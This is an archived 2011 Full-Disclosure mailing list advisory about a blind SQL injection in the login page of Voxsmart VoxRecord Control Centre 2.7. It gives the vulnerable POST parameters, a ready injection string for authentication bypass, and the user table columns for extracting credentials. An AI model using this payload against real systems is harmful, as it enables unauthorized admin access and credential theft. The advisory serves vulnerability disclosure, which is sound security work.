lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <daa2b06fd52bfeee1bbc5dda19f0220a@duszynski.eu>
Date: Wed, 30 Nov 2011 13:06:39 +0100
From: Piotr Duszynski <piotr@...zynski.eu>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Voxsmart VoxRecord Control Centre - Blind SQLi
	and auth. bypass

=======================================================================
VoxRecord Control Centre - version 2.7 Blind SQLi and auth. bypass
=======================================================================

Affected Software : Voxsmart - VoxRecord Control Centre v. 2.7
Severity          : Critical
Local/Remote      : Remote
Author            : Piotr Duszynski @drk1wi

[Summary]

A blind sqli exists in /vcc/login.php login page. This can be used 
either for authentication bypass (admin privileges gained)
or login:pass extraction from the 'voxsuser' database table.

[Vulnerability Details]

HTTP POST :/vcc/login.php
admin_un=adm[ BLIBD SQL INJECTION]&admin_pw=adddm

- Authentication bypass:
set admin_un to "admin'%20or%201%3d1--"

- Blind SQLi data extraction:
'voxsuser' table columns
+-------------------------+----+----------------------------+-----------------------------------------------+------------+------------+
| email                   | id | is_loged                   | password  
                                  | user_type  | username   |
+-------------------------+----+----------------------------+-----------------------------------------------+------------+------------+

[Time-line]

1/10/2011  - Vendor notified
???        - Vendor response
???        - Vendor patch release
30/11/2011 - Public disclosure


Cheers,
@drk1wi

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ